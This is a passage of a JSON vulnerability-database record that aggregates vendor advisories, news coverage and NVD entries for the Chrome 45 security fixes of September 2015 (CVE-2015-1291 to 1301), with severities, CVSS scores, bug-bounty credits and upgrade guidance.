"type": "archlinux", "title": "chromium: multiple issues", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:05", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "description": "\nGoogle Chrome Releases reports:\n\n29 security fixes in this release, including:\n\n[516377] High CVE-2015-1291: Cross-origin bypass in DOM. Credit\n\t to anonymous.\n[522791] High CVE-2015-1292: Cross-origin bypass in\n\t ServiceWorker. Credit to Mariusz Mlynski.\n[524074] High CVE-2015-1293: Cross-origin bypass in DOM. Credit\n\t to Mariusz Mlynski.\n[492263] High CVE-2015-1294: Use-after-free in Skia. Credit\n\t to cloudfuzzer.\n[502562] High CVE-2015-1295: Use-after-free in Printing. Credit\n\t to anonymous.\n[421332] High CVE-2015-1296: Character spoofing in omnibox.\n\t Credit to zcorpan.\n[510802] Medium CVE-2015-1297: Permission scoping error in\n\t Webrequest. Credit to Alexander Kashev.\n[518827] Medium CVE-2015-1298: URL validation error in\n\t extensions. Credit to Rob Wu.\n[416362] Medium CVE-2015-1299: Use-after-free in Blink. Credit\n\t to taro.suzuki.dev.\n[511616] Medium CVE-2015-1300: Information leak in Blink. Credit\n\t to cgvwzq.\n[526825] CVE-2015-1301: Various fixes from internal audits,\n\t fuzzing and other initiatives.\n\n\n", "edition": 4, "modified": "2015-09-01T00:00:00", "published": "2015-09-01T00:00:00", "id": "A9350DF8-5157-11E5-B5C1-E8E0B747A45A", "href": "https://vuxml.freebsd.org/freebsd/a9350df8-5157-11e5-b5c1-e8e0b747a45a.html", "title": "chromium -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:26", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1291", "CVE-2015-1292", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1299", "CVE-2015-1300", "CVE-2015-1301"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Chromium to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nChromium. (CVE-2015-1291, CVE-2015-1292, CVE-2015-1293, CVE-2015-1294,\nCVE-2015-1295, CVE-2015-1296, CVE-2015-1297, CVE-2015-1298, CVE-2015-1299,\nCVE-2015-1300, CVE-2015-1301)\n\nAll Chromium users should upgrade to these updated packages, which contain\nChromium version 45.0.2454.85, which corrects these issues. After\ninstalling the update, Chromium must be restarted for the changes to take \neffect.\n", "modified": "2018-06-07T09:04:22", "published": "2015-09-03T04:00:00", "id": "RHSA-2015:1712", "href": "https://access.redhat.com/errata/RHSA-2015:1712", "type": "redhat", "title": "(RHSA-2015:1712) Important: chromium-browser security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-08-12T01:03:19", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3351-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nSeptember 03, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2015-1291 CVE-2015-1292 CVE-2015-1293 CVE-2015-1294\n CVE-2015-1295 CVE-2015-1296 CVE-2015-1297 CVE-2015-1298\n CVE-2015-1299 CVE-2015-1300 CVE-2015-1301\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2015-1291\n\n A cross-origin bypass issue was discovered in DOM.\n\nCVE-2015-1292\n\n Mariusz Mlynski discovered a cross-origin bypass issue in ServiceWorker.\n\nCVE-2015-1293\n\n Mariusz Mlynski discovered a cross-origin bypass issue in DOM.\n\nCVE-2015-1294\n\n cloudfuzzer discovered a use-after-free issue in the Skia graphics\n library.\n\nCVE-2015-1295\n\n A use-after-free issue was discovered in the printing component.\n\nCVE-2015-1296\n\n zcorpan discovered a character spoofing issue.\n\nCVE-2015-1297\n\n Alexander Kashev discovered a permission scoping error.\n\nCVE-2015-1298\n\n Rob Wu discovered an error validating the URL of extensions.\n\nCVE-2015-1299\n\n taro.suzuki.dev discovered a use-after-free issue in the Blink/WebKit\n library.\n\nCVE-2015-1300\n\n cgvwzq discovered an information disclosure issue in the Blink/WebKit\n library.\n\nCVE-2015-1301\n\n The chrome 45 development team found and fixed various issues\n during internal auditing. Also multiple issues were fixed in\n the libv8 library, version 4.5.103.29.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 45.0.2454.85-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed\nonce the gcc-5 transition completes.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 45.0.2454.85-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2015-09-03T22:41:46", "published": "2015-09-03T22:41:46", "id": "DEBIAN:DSA-3351-1:F2373", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00250.html", "title": "[SECURITY] [DSA 3351-1] chromium-browser security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:56:21", "bulletinFamily": "info", "cvelist": ["CVE-2015-1291", "CVE-2015-1292", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1299", "CVE-2015-1300"], "description": "Tuesday turned out to be a busy day for browser makers.\n\nThe three major vendors in the space\u2014Google; Mozilla; and Microsoft\u2014joined arms and announced their intent to [stop support for the weakened RC4 encryption algorithm](<https://threatpost.com/google-mozilla-microsoft-to-sever-rc4-support-in-early-2016/114498>) starting early next year.\n\nGoogle, having already announced it would [pause Flash-based ads in Chrome](<https://threatpost.com/google-to-pause-flash-ads-in-chrome-starting-next-week/114451>) yesterday, pushed through version 45 of the browser, [patching 29 security vulnerabilities](<http://googlechromereleases.blogspot.ro/2015/09/stable-channel-update.html>) in the process.\n\nGoogle also awarded a number of bounties to external researchers for vulnerabilities that were patched in Chrome 45. Three cross-origin bypass vulnerabilities in DOM and ServiceWorker were worth $7,500 each; two of those bounties were collected by researcher Mariusz Mlynski. Mlynski is a well-known bug hunter in all the major browsers, having cashed in at the [2014 Pwn2Own](<https://threatpost.com/vupen-cashes-in-four-times-at-pwn2own/104754>) contest with a [Mozilla bug worth $50,000](<https://threatpost.com/mozilla-patches-pwn2own-zero-days-in-firefox-28/104889>).\n\nIn all there were 10 bounties paid. From the Chrome blog:\n\n> [$7500][[516377](<https://code.google.com/p/chromium/issues/detail?id=516377>)] **High **CVE-2015-1291: Cross-origin bypass in DOM. _Credit to anonymous._\n> \n> [$7500][[522791](<https://code.google.com/p/chromium/issues/detail?id=522791>)] **High **CVE-2015-1292: Cross-origin bypass in ServiceWorker. _Credit to Mariusz Mlynski._\n> \n> [$7500][[524074](<https://code.google.com/p/chromium/issues/detail?id=524074>)] **High **CVE-2015-1293: Cross-origin bypass in DOM. _Credit to Mariusz Mlynski._\n> \n> [$5000][[492263](<https://code.google.com/p/chromium/issues/detail?id=492263>)] **High **CVE-2015-1294: Use-after-free in Skia. _Credit to cloudfuzzer._\n> \n> [$3000][[502562](<https://code.google.com/p/chromium/issues/detail?id=502562>)] **High **CVE-2015-1295: Use-after-free in Printing. _Credit to anonymous._\n> \n> [$1000][[421332](<https://code.google.com/p/chromium/issues/detail?id=421332>)] **High **CVE-2015-1296: Character spoofing in omnibox. _Credit to zcorpan._\n> \n> [$3000][[510802](<https://code.google.com/p/chromium/issues/detail?id=510802>)] **Medium **CVE-2015-1297: Permission scoping error in WebRequest. _Credit to Alexander Kashev._\n> \n> [$3000][[518827](<https://code.google.com/p/chromium/issues/detail?id=518827>)] **Medium **CVE-2015-1298: URL validation error in extensions. _Credit to Rob Wu._\n> \n> [$2000][[416362](<https://code.google.com/p/chromium/issues/detail?id=416362>)] **Medium **CVE-2015-1299: Use-after-free in Blink. _Credit to taro.suzuki.dev._\n> \n> [$1000][[511616](<https://code.google.com/p/chromium/issues/detail?id=511616>)] **Medium **CVE-2015-1300: Information leak in Blink. _Credit to cgvwzq._\n\nGoogle last week announced that it would begin on Tuesday pausing Flash ads in Chrome, primarily in the name of performance, but the move was applauded by security experts. Amazon echoed the move, also [pausing Flash-based ads](<http://advertising.amazon.com/ad-specs/en/policy/technical-guidelines>) on its webpages.\n\nAdobe\u2019s Flash Player is a popular target for hackers given its presence on a number of platforms and the fact that those ads generally run automatically on websites, executing malicious code along with the ad. Google hopes to convince advertisers to convert Flash content to HTML5; Google has begun automatically converting some Flash ads to HTML5.\n\nGoogle said in June its decision to [pause Flash ads](<https://plus.google.com/+GoogleAds/posts/UQSBzWiMpEG?e=-RedirectToSandbox>) is based primarily on the need to increase page-load speed and battery life on mobile devices.\n\nYesterday, the major browser makers announced that deprecation of RC4 encryption would begin in the January-February 2016 timeframe. Mozilla expects the move to be official with the release of Firefox 44 in late January, while Chrome, Internet Explorer 11 and Microsoft Edge should follow suit by the end of February, Google and Microsoft said.\n\nFor more than a decade, researchers have been poking holes in RC4, finding biases in the stream cipher\u2019s not-so random bytes used to encrypt plaintext. An attacker with enough time and processing power and access to enough TLS requests could figure out plaintext.\n", "modified": "2015-09-02T12:48:53", "published": "2015-09-02T08:48:53", "id": "THREATPOST:11A1C9F40976B75AB3CA7BBF0CEC88B3", "href": "https://threatpost.com/google-patches-critical-vulnerabilities-in-chrome-45/114509/", "type": "threatpost", "title": "Google Chrome 45 Security Patches, Bug Bounty Awards", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "kaspersky": [{"lastseen": "2020-09-02T11:41:00", "bulletinFamily": "info", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-6583", "CVE-2015-1297", "CVE-2015-6580", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-6582", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-6581", "CVE-2015-1292", "CVE-2015-1299"], "description": "### *Detect date*:\n09/01/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome. Malicious users can exploit these vulnerabilities to spoof user interface, cause denial of service, bypass security restrictions or obtain sensitive information.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 45.0.2454.85\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Get Google Chrome](<https://www.google.com/chrome/browser/desktop/index.html>)\n\n### *Original advisories*:\n[Google release blog entry](<http://googlechromereleases.blogspot.ru/2015/09/stable-channel-update.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+GoogleChromeReleases+\\(Google+Chrome+Releases\\)>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2015-1299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1299>)7.5Critical \n[CVE-2015-1300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1300>)5.0Critical \n[CVE-2015-1301](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1301>)7.5Critical \n[CVE-2015-6581](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6581>)7.5Critical \n[CVE-2015-1295](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1295>)7.5Critical \n[CVE-2015-1296](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1296>)5.0Critical \n[CVE-2015-1297](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1297>)7.5Critical \n[CVE-2015-1298](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1298>)4.3Warning \n[CVE-2015-6582](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6582>)6.8High \n[CVE-2015-6583](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6583>)4.3Warning \n[CVE-2015-6580](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6580>)7.5Critical \n[CVE-2015-1294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1294>)7.5Critical \n[CVE-2015-1291](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1291>)6.4High \n[CVE-2015-1292](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1292>)5.0Critical \n[CVE-2015-1293](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1293>)7.5Critical", "edition": 41, "modified": "2020-05-22T00:00:00", "published": "2015-09-01T00:00:00", "id": "KLA10655", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10655", "title": "\r KLA10655\u007fMultiple vulnerabilities in Google Chrome ", "type": "kaspersky", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:37:41", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1332", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "description": "It was discovered that the DOM tree could be corrupted during parsing in \nsome circumstances. If a user were tricked in to opening a specially \ncrafted website, an attacker could potentially exploit this to bypass \nsame-origin restrictions or cause a denial of service. (CVE-2015-1291)\n\nAn issue was discovered in NavigatorServiceWorker::serviceWorker in Blink. \nIf a user were tricked in to opening a specially crafted website, an \nattacker could potentially exploit this to bypass same-origin \nrestrictions. (CVE-2015-1292)\n\nAn issue was discovered in the DOM implementation in Blink. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit this to bypass same-origin restrictions. \n(CVE-2015-1293)\n\nA use-after-free was discovered in Skia. If a user were tricked in to \nopening a specially crafted website, an attacker could potentially exploit \nthis to cause a denial of service via renderer crash, or execute arbitrary \ncode with the privileges of the sandboxed render process. (CVE-2015-1294)\n\nA use-after-free was discovered in the shared-timer implementation in \nBlink. If a user were tricked in to opening a specially crafted website, \nan attacker could potentially exploit this to cause a denial of service \nvia renderer crash, or execute arbitrary code with the privileges of the \nsandboxed render process. (CVE-2015-1299)\n\nIt was discovered that the availability of iframe Resource Timing API \ntimes was not properly restricted in some circumstances. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit this to obtain sensitive information. (CVE-2015-1300)\n\nMultiple security issues were discovered in Chromium. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit these to read uninitialized memory, cause a denial \nof service via application crash or execute arbitrary code with the \nprivileges of the user invoking the program. (CVE-2015-1301)\n\nA heap corruption issue was discovered in oxide::JavaScriptDialogManager. \nIf a user were tricked in to opening a specially crafted website, an \nattacker could potentially exploit this to cause a denial of service via \napplication crash, or execute arbitrary code with the privileges of the \nuser invoking the program. (CVE-2015-1332)", "edition": 5, "modified": "2015-09-08T00:00:00", "published": "2015-09-08T00:00:00", "id": "USN-2735-1", "href": "https://ubuntu.com/security/notices/USN-2735-1", "title": "Oxide vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:01", "bulletinFamily": "software", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1332", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2735-1\r\nSeptember 08, 2015\r\n\r\noxide-qt vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in Oxide.\r\n\r\nSoftware Description:\r\n- oxide-qt: Web browser engine library for Qt (QML plugin)\r\n\r\nDetails:\r\n\r\nIt was discovered that the DOM tree could be corrupted during parsing in\r\nsome circumstances. If a user were tricked in to opening a specially\r\ncrafted website, an attacker could potentially exploit this to bypass\r\nsame-origin restrictions or cause a denial of service. (CVE-2015-1291)\r\n\r\nAn issue was discovered in NavigatorServiceWorker::serviceWorker in Blink.\r\nIf a user were tricked in to opening a specially crafted website, an\r\nattacker could potentially exploit this to bypass same-origin\r\nrestrictions. (CVE-2015-1292)\r\n\r\nAn issue was discovered in the DOM implementation in Blink. If a user were\r\ntricked in to opening a specially crafted website, an attacker could\r\npotentially exploit this to bypass same-origin restrictions.\r\n(CVE-2015-1293)\r\n\r\nA use-after-free was discovered in Skia. If a user were tricked in to\r\nopening a specially crafted website, an attacker could potentially exploit\r\nthis to cause a denial of service via renderer crash, or execute arbitrary\r\ncode with the privileges of the sandboxed render process. (CVE-2015-1294)\r\n\r\nA use-after-free was discovered in the shared-timer implementation in\r\nBlink. If a user were tricked in to opening a specially crafted website,\r\nan attacker could potentially exploit this to cause a denial of service\r\nvia renderer crash, or execute arbitrary code with the privileges of the\r\nsandboxed render process. (CVE-2015-1299)\r\n\r\nIt was discovered that the availability of iframe Resource Timing API\r\ntimes was not properly restricted in some circumstances. If a user were\r\ntricked in to opening a specially crafted website, an attacker could\r\npotentially exploit this to obtain sensitive information. (CVE-2015-1300)\r\n\r\nMultiple security issues were discovered in Chromium. If a user were\r\ntricked in to opening a specially crafted website, an attacker could\r\npotentially exploit these to read uninitialized memory, cause a denial\r\nof service via application crash or execute arbitrary code with the\r\nprivileges of the user invoking the program. (CVE-2015-1301)\r\n\r\nA heap corruption issue was discovered in oxide::JavaScriptDialogManager.\r\nIf a user were tricked in to opening a specially crafted website, an\r\nattacker could potentially exploit this to cause a denial of service via\r\napplication crash, or execute arbitrary code with the privileges of the\r\nuser invoking the program. (CVE-2015-1332)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.04:\r\n liboxideqtcore0 1.9.1-0ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n liboxideqtcore0 1.9.1-0ubuntu0.14.04.2\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2735-1\r\n CVE-2015-1291, CVE-2015-1292, CVE-2015-1293, CVE-2015-1294,\r\n CVE-2015-1299, CVE-2015-1300, CVE-2015-1301, CVE-2015-1332,\r\n https://launchpad.net/bugs/1470905\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/oxide-qt/1.9.1-0ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/oxide-qt/1.9.1-0ubuntu0.14.04.2\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-09-14T00:00:00", "published": "2015-09-14T00:00:00", "id": "SECURITYVULNS:DOC:32500", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32500", "title": "[USN-2735-1] Oxide vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1300", "CVE-2015-1302", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "description": "Restrictions bypass, DoS, memory corruptions, information disclosure.", "edition": 1, "modified": "2015-09-14T00:00:00", "published": "2015-09-14T00:00:00", "id": "SECURITYVULNS:VULN:14682", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14682", "title": "Google Chrome / Oxide multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2021-02-02T06:21:21", "description": "Multiple use-after-free vulnerabilities in the PrintWebViewHelper class in components/printing/renderer/print_web_view_helper.cc in Google Chrome before 45.0.2454.85 allow user-assisted remote attackers to cause a denial of service or possibly have unspecified other impact by triggering nested IPC messages during preparation for printing, as demonstrated by messages associated with PDF documents in conjunction with messages about printer capabilities.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 6, "cvss3": {}, "published": "2015-09-03T22:59:00", "title": "CVE-2015-1295", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1295"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/a:google:chrome:44.0.2403"], "id": "CVE-2015-1295", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1295", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:44.0.2403:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:21", "description": "The RuntimeEventRouter::OnExtensionUninstalled function in extensions/browser/api/runtime/runtime_api.cc in Google Chrome before 45.0.2454.85 does not ensure that the setUninstallURL preference corresponds to the URL of a web site, which allows user-assisted remote attackers to trigger access to an arbitrary URL via a crafted extension that is uninstalled.", "edition": 6, "cvss3": {}, "published": "2015-09-03T22:59:00", "title": "CVE-2015-1298", "type": "cve", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1298"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/a:google:chrome:44.0.2403"], "id": "CVE-2015-1298", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1298", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:44.0.2403:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:21", "description": "Use-after-free vulnerability in the shared-timer implementation in Blink, as used in Google Chrome before 45.0.2454.85, allows remote attackers to cause a denial of service or possibly have unspecified other impact by leveraging erroneous timer firing, related to ThreadTimers.cpp and Timer.cpp.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 6, "cvss3": {}, "published": "2015-09-03T22:59:00", "title": "CVE-2015-1299", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1299"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/a:google:chrome:44.0.2403"], "id": "CVE-2015-1299", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:44.0.2403:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:21", "description": "The UnescapeURLWithAdjustmentsImpl implementation in net/base/escape.cc in Google Chrome before 45.0.2454.85 does not prevent display of Unicode LOCK characters in the omnibox, which makes it easier for remote attackers to spoof the SSL lock icon by placing one of these characters at the end of a URL, as demonstrated by the omnibox in localizations for right-to-left languages.", "edition": 6, "cvss3": {}, "published": "2015-09-03T22:59:00", "title": "CVE-2015-1296", "type": "cve", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1296"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/a:google:chrome:44.0.2403"], "id": "CVE-2015-1296", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1296", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:44.0.2403:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:21", "description": "The WebRequest API implementation in extensions/browser/api/web_request/web_request_api.cc in Google Chrome before 45.0.2454.85 does not properly consider a request's source before accepting the request, which allows remote attackers to bypass intended access restrictions via a crafted (1) app or (2) extension.", "edition": 6, "cvss3": {}, "published": "2015-09-03T22:59:00", "title": "CVE-2015-1297", "type": "cve", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1297"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/a:google:chrome:44.0.2403"], "id": "CVE-2015-1297", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1297", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:44.0.2403:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:21:21", "description": "Use-after-free vulnerability in the SkMatrix::invertNonIdentity function in core/SkMatrix.cpp in Skia, as used in Google Chrome before 45.0.2454.85, allows remote attackers to cause a denial of service or possibly have unspecified other impact by triggering the use of matrix elements that lead to an infinite result during an inversion calculation.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 6, "cvss3": {}, "published": "2015-09-03T22:59:00", "title": "CVE-2015-1294", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1294"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/a:google:chrome:44.0.2403"], "id": "CVE-2015-1294", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1294", "cvss": {"score": 7.5, "vector": 